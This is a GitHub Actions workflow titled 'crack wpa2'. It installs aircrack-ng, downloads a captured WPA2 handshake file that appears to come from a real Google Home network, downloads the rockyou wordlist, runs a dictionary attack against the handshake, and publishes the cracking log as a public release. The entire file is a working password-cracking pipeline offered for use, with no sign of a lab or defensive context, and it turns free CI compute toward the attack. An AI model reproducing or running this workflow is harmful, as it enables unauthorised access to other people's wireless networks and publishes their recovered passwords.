name: crack wpa2

on:
  workflow_dispatch:
  release:
    types: [published]  
    
jobs:
  download-and-release:
    runs-on: ubuntu-latest
    
    steps:
    - name: Checkout repository
      uses: actions/checkout@v4
      with:
        fetch-depth: 0

    - name: Download files
      run: |
        sudo apt update
        sudo apt install aircrack-ng -y
        mkdir -p downloads
        wget -O downloads/wpa2.hccapx https://raw.githubusercontent.com/xiv3r/Xiaomi-Router-4C-OpenWRT-Image-Builder/refs/heads/main/.github/workflows/GHome_A1A33J.hccapx
        wget -O downloads/rockyou.txt https://huggingface.co/datasets/Canstralian/Wordlists/resolve/3a6334a4540d446d8f91f4c73401cafbbfe55d22/rockyou.txt?download=true
  
    - name: Cracking
      run: |
        cd downloads
        aircrack-ng -w rockyou.txt wpa2.hccapx > results.log
        
    - name: Determine release tag
      id: get_tag
      run: |
        if [ "${{ github.event_name }}" == "release" ]; then
          TAG_NAME="${{ github.event.release.tag_name }}"
        else
          # Use the existing "rootfs" tag
          TAG_NAME="results"
        fi
        echo "tag_name=$TAG_NAME" >> $GITHUB_OUTPUT

    - name: Upload files to existing release
      uses: softprops/action-gh-release@v1
      with:
        tag_name: ${{ steps.get_tag.outputs.tag_name }}
        files: |
          downloads/*.log
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
